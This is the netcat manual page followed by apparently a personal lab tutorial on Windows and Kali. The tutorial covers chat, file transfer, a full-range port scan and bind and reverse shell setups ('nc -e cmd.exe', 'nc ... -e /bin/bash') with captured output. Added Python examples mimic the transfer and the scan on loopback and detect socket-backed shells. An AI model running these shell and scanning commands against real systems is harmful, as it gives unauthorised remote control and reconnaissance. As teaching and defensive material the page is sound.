"""
NC(1) General Commands Manual 通用命令手冊
NAME
nc - TCP/IP swiss army knife TCP/IP瑞士軍刀
SYNOPSIS 概要
nc [-options] hostname port[s] [ports] ...
nc -l -p port [-options] [hostname] [port]
DESCRIPTION 描述
netcat is a simple unix utility which reads and writes data across
network connections, using TCP or UDP protocol. It is designed to be a
reliable "back-end" tool that can be used directly or easily driven by
other programs and scripts. At the same time, it is a feature-rich
network debugging and exploration tool, since it can create almost any
kind of connection you would need and has several interesting built-in
capabilities. Netcat, or "nc" as the actual program is named, should
have been supplied long ago as another one of those cryptic but
standard Unix tools.
In the simplest usage, "nc host port" creates a TCP connection to the
given port on the given target host. Your standard input is then sent
to the host, and anything that comes back across the connection is sent
to your standard output. This continues indefinitely, until the
network side of the connection shuts down. Note that this behavior is
different from most other applications which shut everything down and
exit after an end-of-file on the standard input.
Netcat can also function as a server, by listening for inbound
connections on arbitrary ports and then doing the same reading and
writing. With minor limitations, netcat doesn't really care if it runs
in "client" or "server" mode -- it still shovels data back and forth
until there isn't any more left. In either mode, shutdown can be forced
after a configurable time of inactivity on the network side.
And it can do this via UDP too, so netcat is possibly the "udp
telnet-like" application you always wanted for testing your UDP-mode
servers. UDP, as the "U" implies, gives less reliable data transmission
than TCP connections and some systems may have trouble sending large
amounts of data that way, but it's still a useful capability to have.
You may be asking "why not just use telnet to connect to arbitrary
ports?" Valid question, and here are some reasons. Telnet has the
"standard input EOF" problem, so one must introduce calculated delays
in driving scripts to allow network output to finish. This is the main
reason netcat stays running until the *network* side closes. Telnet
also will not transfer arbitrary binary data, because certain
characters are interpreted as telnet options and are thus removed from
the data stream. Telnet also emits some of its diagnostic messages to
standard output, where netcat keeps such things religiously separated
from its *output* and will never modify any of the real data in transit
unless you *really* want it to. And of course telnet is incapable of
listening for inbound connections, or using UDP instead. Netcat
doesn't have any of these limitations, is much smaller and faster than
telnet, and has many other advantages.
OPTIONS
-c string   specify shell commands to exec after connect (use with
            caution). The string is passed to /bin/sh -c for
            execution. See the -e option if you don't have a working
            /bin/sh (note that a POSIX-conformant system must have one).
-e filename specify filename to exec after connect (use with caution).
            See the -c option for enhanced functionality.
-g gateway  source-routing hop point[s], up to 8
-G num      source-routing pointer: 4, 8, 12, ...
-h          display help
-i secs     delay interval for lines sent, ports scanned
-l          listen mode, for inbound connects
-L          keep listening after the client ends the connection (an
            option of the Windows build, not of the Unix one)
-n          numeric-only IP addresses, no DNS
-o file     hex dump of traffic
-p port     local port number (port numbers can be individual or
            ranges: lo-hi [inclusive])
-q seconds  after EOF on stdin, wait the specified number of seconds
            and then quit. If seconds is negative, wait forever.
-b          allow UDP broadcasts
-r          randomize local and remote ports (listen on whichever port
            it happens to pick)
-s addr     local source address (useful for source-address spoofing)
-t          enable telnet negotiation
-u          UDP mode
-v          verbose [use twice to be more verbose]
-w secs     timeout for connects and final net reads
-C          send CRLF as line-ending
-z          zero-I/O mode [used for scanning]
-T type     set TOS flag (type may be one of "Minimize-Delay",
            "Maximize-Throughput", "Maximize-Reliability", or
            "Minimize-Cost".)
COPYRIGHT
Netcat is entirely my own creation, although plenty of other code was
used as examples. It is freely given away to the Internet community in
the hope that it will be useful, with no restrictions except giving
credit where it is due. No GPLs, Berkeley copyrights or any of that
nonsense. The author assumes NO responsibility for how anyone uses it.
If netcat makes you rich somehow and you're feeling generous, mail me a
check. If you are affiliated in any way with Microsoft Network, get a
life. Always ski in control. Comments, questions, and patches to
hob[email protected].
NOTES
Some port names in /etc/services contain hyphens -- netcat currently
will not correctly parse those unless you escape the hyphens with
backslashes (e.g. "netcat localhost 'ftp\-data'").
BUGS
Efforts have been made to have netcat "do the right thing" in all its
various modes. If you believe that it is doing the wrong thing under
whatever circumstances, please notify me and tell me how you think it
should behave. If netcat is not able to do some task you think up,
minor tweaks to the code will probably fix that. It provides a basic
and easily-modified template for writing other network applications,
and I certainly encourage people to make custom mods and send in any
improvements they make to it. Continued feedback from the Internet
community is always welcome!
EXAMPLES
For several netcat recipes, please see /usr/share/doc/netcat/README.gz
and /usr/share/doc/netcat/README.Debian.gz.
AUTHOR
This manual page was written by Joey Hess <[email protected]> and Robert
Woodcock <[email protected]>, cribbing heavily from Netcat's README file.
Netcat was written by a guy we know as the Hobbit <[email protected]>.
Download: https://eternallybored.org/misc/netcat/
Some simple examples follow (Windows, 64-bit build):
- Start the server side:
Open a window:
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444
(accept the firewall prompt) The server is now up.
- Connect to the server:
Then open another window and type (use your own IP address):
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444
There is no echo or prompt at this point, but the connection is
established; type anything: what the client sends is printed by the
server, and what the server sends is printed by the client.
- Start a shell server:
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 -e cmd.exe
- Connect to it:
sanqiushu@DESKTOP-343EN6M:~$ nc 10.20.3.129 4444
Microsoft Windows [Version 10.0.17134.885]
(c) 2018 Microsoft Corporation. All rights reserved.
F:\SecTools\apps\netcat-win32-1.12>
Once connected, a command prompt comes straight back (to get a
different path I used the Linux build of nc).
F:\SecTools\apps\netcat-win32-1.12>dir
dir
 (cmd.exe's Chinese header lines arrived as mojibake on the Linux side;
 they are shown here in the English form of dir)
 Volume in drive F (label line garbled in the capture)
 Volume Serial Number is 1646-F9AD
 Directory of F:\SecTools\apps\netcat-win32-1.12
2019/08/14 15:08 <DIR> .
2019/08/14 15:08 <DIR> ..
2004/12/28 12:23 12,166 doexec.c
1996/07/09 17:01 7,283 generic.h
1996/11/06 23:40 22,784 getopt.c
1994/11/03 20:07 4,765 getopt.h
1998/02/06 16:50 61,780 hobbit.txt
2004/12/27 18:37 18,009 license.txt
2011/09/17 00:46 300 Makefile
2019/08/14 14:42 4 nc.bat
2011/09/17 00:52 38,616 nc.exe
2011/09/17 00:52 45,272 nc64.exe
2011/09/17 00:44 69,850 netcat.c
2011/09/17 00:45 6,885 readme.txt
 12 File(s) 287,714 bytes
 2 Dir(s) 199,469,047,808 bytes free
F:\SecTools\apps\netcat-win32-1.12>
Commands can be run directly (though the garbled Chinese is a
headache); it seems best to stick to Windows-to-Windows and
Linux-to-Linux from now on.
- Transfer a file
The server receives a file:
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 >F:\SecTools\apps\netcat-win32-1.12\readme2.txt
The client sends a file:
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 < F:\SecTools\apps\netcat-win32-1.12\readme.txt
Neither side shows any reaction, but the transfer has completed.
Why does the Windows side need absolute paths?
The Linux sender seems to need absolute paths too???
The client receives a file:
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 > F:\SecTools\apps\netcat-win32-1.12\readme3.txt
The server sends a file:
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 < F:\SecTools\apps\netcat-win32-1.12\readme.txt
An option such as -w5 sets a wait time: if the connection is not up
within 5 s because of network delay, the command exits.
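The transfer above ends silently, and the man page's description of the simplest usage (and its telnet comparison) explains why: the receiving nc keeps reading until the network side closes, so the sender has to close its side once stdin reaches EOF (the -q option controls that wait). The block below is an added example, not code from this page or from netcat itself: two Python functions that mimic `nc -l -p PORT > file` and `nc HOST PORT < file` over loopback, hash the bytes on both ends (the check worth doing after a transfer that shows "no reaction"), and show what happens when the sender never half-closes. The payload is a constructed stand-in for readme.txt, and the port is chosen by the kernel rather than being 4444.

```python
"""Added example: a loopback re-creation of 'nc -l -p PORT > file' (receiver)
and 'nc HOST PORT < file' (sender), with a hash on both ends. Not netcat's
own code; the payload below is constructed for the demo."""
import hashlib
import socket
import threading

# Constructed stand-in for readme.txt: large enough to span several TCP
# segments so the receiver really does have to loop on recv().
SAMPLE_FILE = b"netcat 1.12 readme, constructed sample line\n" * 2000


def start_receiver(timeout: float):
    """Behaves like 'nc -l -p PORT > file': accept one connection and copy
    everything that arrives until the peer closes (network EOF).

    The kernel picks the port (bind to 0); returns (port, result, thread).
    result is filled in by the thread: sha256/size on success, or 'error'
    when the peer never closed and the read timed out."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    result = {}

    def run():
        srv.settimeout(timeout)
        try:
            conn, _ = srv.accept()
        except OSError as exc:
            result["error"] = f"accept failed: {exc}"
            srv.close()
            return
        srv.close()
        conn.settimeout(timeout)
        received = bytearray()
        try:
            while True:
                chunk = conn.recv(65536)
                if not chunk:          # b"" means the sender closed its side
                    break
                received.extend(chunk)
            result["sha256"] = hashlib.sha256(received).hexdigest()
            result["size"] = len(received)
        except socket.timeout:
            # The sender delivered its data but never closed: this is the hang
            # that 'nc -q' (sender) and 'nc -w' (receiver) exist to cut short.
            result["error"] = "timed out waiting for network EOF"
            result["size"] = len(received)
        finally:
            conn.close()

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return port, result, t


def send_like_nc(port: int, data: bytes, close_after_eof: bool) -> socket.socket:
    """Behaves like 'nc 127.0.0.1 PORT < file'. With close_after_eof the
    sender half-closes once the data is out (what 'nc -q 0' does at stdin
    EOF); without it the connection simply stays open, which is the
    'wait for the network side' behaviour the man page describes."""
    s = socket.create_connection(("127.0.0.1", port), timeout=5.0)
    s.sendall(data)
    if close_after_eof:
        s.shutdown(socket.SHUT_WR)      # FIN: "no more data", still readable
    return s                            # caller closes it when done


def transfer(data: bytes = SAMPLE_FILE, close_after_eof: bool = True,
             timeout: float = 2.0) -> dict:
    """Run one transfer and return the receiver's result together with the
    sender-side hash, so they can be compared like sha256sum on both ends."""
    port, result, t = start_receiver(timeout)
    sock = send_like_nc(port, data, close_after_eof)
    t.join(timeout + 5)
    sock.close()
    result["sent_sha256"] = hashlib.sha256(data).hexdigest()
    return result


if __name__ == "__main__":
    print("sender half-closes:  ", transfer())
    print("sender never closes: ", transfer(close_after_eof=False))
```

With the real tools the same check is `sha256sum readme.txt` on the sending side and `sha256sum readme2.txt` on the receiving side; if the receiver is still sitting there after the bytes have arrived, the sender was started without `-q` (or the receiver without `-w`) and the Windows build's own defaults apply.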
Port scanning with the Windows build of nc is unbelievably slow; by the
time the scan finished I felt half dead.
The one on Ubuntu is no good either.
But the nc on Kali Linux is really fast:
root@Sanqiushu:~# nc -z -v -n 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
root@Sanqiushu:~#
A scan of all ports took under 2 minutes.
root@Sanqiushu:~# echo "" | nc -v -n 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
Protocol mismatch.
root@Sanqiushu:~#
Some services do not reply with a banner.
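The two scans above show what `-z` does (a full TCP connect, then an immediate close with no data) and what `echo "" | nc` adds (a bare newline, then print whatever comes back; that is why the SSH server answers with its version banner followed by "Protocol mismatch." while other services stay silent). The block below is an added example, not from this page or from netcat: a Python connect scan and banner grab in that spirit, run against constructed loopback services (a fake SSH banner, a silent service and a closed port). The banner text is copied from the page for recognisability, the ports are assigned by the kernel, and the printed line format copies netcat's verbose output.

```python
"""Added example: 'nc -z -v' style connect scan and 'echo "" | nc' style
banner grab, against constructed loopback services. Not netcat's code."""
import socket
import threading


def serve(banner: bytes, reply_to_input: bytes = b"") -> int:
    """Constructed target service on 127.0.0.1, port chosen by the kernel.
    On accept it sends `banner` (nothing if empty: a service that waits for
    the client to speak first), reads one chunk of client input, answers it
    with `reply_to_input` if any, then closes. Returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def run():
        while True:
            conn, _ = srv.accept()
            try:
                conn.settimeout(2.0)
                if banner:
                    conn.sendall(banner)
                data = conn.recv(1024)         # b"" if the client just closed (-z)
                if data and reply_to_input:
                    conn.sendall(reply_to_input)
            except OSError:
                pass                           # peer reset or went quiet
            finally:
                conn.close()

    threading.Thread(target=run, daemon=True).start()
    return port


def service_name(port: int) -> str:
    """Name from /etc/services, or '?' as netcat prints for unknown ports."""
    try:
        return socket.getservbyport(port)
    except OSError:
        return "?"


def connect_scan(host: str, ports, timeout: float = 1.0) -> list:
    """'nc -z -v -n host ports': a full TCP handshake then an immediate
    close, no data sent. Prints netcat's verbose line for open ports and
    returns them in scan order."""
    found = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                pass                           # zero I/O: the handshake is the test
        except OSError:
            continue                           # refused, filtered or timed out
        print(f"(UNKNOWN) [{host}] {port} ({service_name(port)}) open")
        found.append(port)
    return found


def grab_banner(host: str, port: int, timeout: float = 1.0):
    """'echo "" | nc -v -n host port': send a bare newline and collect what
    comes back until the service closes or stops talking. Returns None for
    a closed port and b'' for a service that sends nothing unprompted."""
    got = bytearray()
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"\n")
            s.settimeout(timeout)
            while True:
                try:
                    chunk = s.recv(4096)
                except socket.timeout:
                    break
                if not chunk:
                    break
                got.extend(chunk)
    except OSError:
        return None
    return bytes(got)


def demo() -> dict:
    """Set up the constructed targets, scan them, then grab banners from
    the open ones."""
    ssh = serve(b"SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3\r\n",
                reply_to_input=b"Protocol mismatch.\n")
    silent = serve(b"")
    probe = socket.socket()                    # grab and release a port so
    probe.bind(("127.0.0.1", 0))               # there is one that is closed
    closed = probe.getsockname()[1]
    probe.close()
    open_ports = connect_scan("127.0.0.1", [ssh, silent, closed])
    banners = {p: grab_banner("127.0.0.1", p) for p in open_ports}
    return {"ssh": ssh, "silent": silent, "closed": closed,
            "open": open_ports, "banners": banners}


if __name__ == "__main__":
    for port, banner in demo()["banners"].items():
        print(port, banner or "(no banner)")
```

The silent service is the case the last line above describes: the port is open, the newline is accepted, and nothing comes back, so a banner grab alone cannot tell you what is listening there.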
- Set up a listening (bind) backdoor
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444 -e cmd.exe
(Anyone who can reach port 4444 gets this cmd.exe: there is no
authentication and no encryption, which is what the man page's "use
with caution" on -e means.)
- Set up a connect-back (reverse) backdoor
The server starts listening:
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444
The client connects:
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 -e cmd.exe
Once the client connects, the server gets a command prompt:
Microsoft Windows [Version 10.0.17134.885]
(c) 2018 Microsoft Corporation. All rights reserved.
F:\SecTools\apps\netcat-win32-1.12>
Start the listener on the Windows side:
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444
Connect from Kali:
root@Sanqiushu:~# nc 10.20.3.129 4444 -e /bin/bash
Nothing is printed, but the shell has been returned and commands can be
run directly (oddly, if you type a wrong command you do not see the
error message on this side). Some Linux builds of nc have no -e option,
Ubuntu's for example.
Use the -d option to run nc in the background.
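From the defender's side, the `-e /bin/bash` reverse shell and the `-l -p 4444 -e cmd.exe` bind shell above leave a recognisable trace on Linux: netcat exec()s the program with the connected socket as its stdin, stdout and stderr, so `/proc/PID/fd/0`, `1` and `2` of the bash process all point at `socket:[inode]` entries, and that inode can be looked up in `/proc/net/tcp` to get the peer address. The block below is an added example, not from this page or from netcat: a Python check that classifies a process from its name and fd table, resolves the socket inode to the remote endpoint, and walks /proc when run on a Linux host. The list of shell names, the sample fd tables and the sample `/proc/net/tcp` line are constructed for the demo (the line uses the page's 10.20.3.129:4444 as the peer); the Windows `cmd.exe` case has no /proc and is not covered.

```python
"""Added example: spot shells whose stdin/stdout/stderr are sockets, the
footprint of 'nc -e /bin/bash' on Linux. Not netcat's code; the sample
data below is constructed."""
import os
import re
import socket

# Assumption for the demo: the process names treated as shells.
SHELLS = {"sh", "bash", "dash", "zsh", "ash", "ksh"}
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")


def is_socket_backed_shell(comm: str, fd_targets: dict) -> bool:
    """comm is /proc/PID/comm; fd_targets maps fd name -> readlink target.
    True only when the process is a shell and fds 0, 1 and 2 are all
    sockets. An ssh session's shell has /dev/pts/N there and a cron job
    has pipes, so neither is flagged."""
    if comm not in SHELLS:
        return False
    return all(SOCKET_RE.match(fd_targets.get(fd, "")) for fd in ("0", "1", "2"))


def _hex_addr(h: str) -> tuple:
    """'8103140A:115C' from /proc/net/tcp -> ('10.20.3.129', 4444).
    The IPv4 address is stored little-endian, the port big-endian."""
    ip_hex, port_hex = h.split(":")
    return socket.inet_ntoa(bytes.fromhex(ip_hex)[::-1]), int(port_hex, 16)


def parse_proc_net_tcp(text: str) -> dict:
    """inode -> ((local ip, port), (remote ip, port)) for every line of
    /proc/net/tcp except the header."""
    table = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 10:
            continue
        table[fields[9]] = (_hex_addr(fields[1]), _hex_addr(fields[2]))
    return table


def peer_of(fd_targets: dict, tcp_table: dict):
    """Remote endpoint of the socket on fd 0, if it is a TCP socket."""
    m = SOCKET_RE.match(fd_targets.get("0", ""))
    if not m or m.group(1) not in tcp_table:
        return None
    return tcp_table[m.group(1)][1]


def find_socket_backed_shells() -> list:
    """Linux only: walk /proc and return [(pid, comm, peer)] for shells
    whose standard fds are sockets. A lead to investigate, not a verdict:
    some legitimate daemons also run a shell on a socket."""
    hits = []
    try:
        with open("/proc/net/tcp") as f:
            tcp_table = parse_proc_net_tcp(f.read())
    except OSError:
        return hits                                # not Linux / no /proc
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            fd_dir = f"/proc/{pid}/fd"
            targets = {fd: os.readlink(os.path.join(fd_dir, fd))
                       for fd in os.listdir(fd_dir)}
        except OSError:
            continue                               # vanished, or not our process
        if is_socket_backed_shell(comm, targets):
            hits.append((int(pid), comm, peer_of(targets, tcp_table)))
    return hits


# Constructed samples: the fd table of a bash started by
# 'nc 10.20.3.129 4444 -e /bin/bash', the fd table of a normal ssh login
# shell, and one /proc/net/tcp line for the reverse-shell connection.
SAMPLE_FDS = {"0": "socket:[4242]", "1": "socket:[4242]", "2": "socket:[4242]"}
SAMPLE_SSH_FDS = {"0": "/dev/pts/1", "1": "/dev/pts/1", "2": "/dev/pts/1"}
SAMPLE_NET_TCP = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 3A03140A:9E3C 8103140A:115C 01 00000000:00000000 00:00000000 00000000     0        0 4242 1 0000000000000000 20 4 30 10 -1\n"
)

if __name__ == "__main__":
    print(is_socket_backed_shell("bash", SAMPLE_FDS),
          peer_of(SAMPLE_FDS, parse_proc_net_tcp(SAMPLE_NET_TCP)))
    print(find_socket_backed_shells())
```

Run as root the /proc walk sees every process; as an ordinary user it only sees your own, since readlink on another user's fd entries is refused. The same fd pattern also appears for the bind-shell variant (`nc -l -p 4444 -e /bin/bash`), because -e dup()s the accepted socket onto the standard descriptors in both directions.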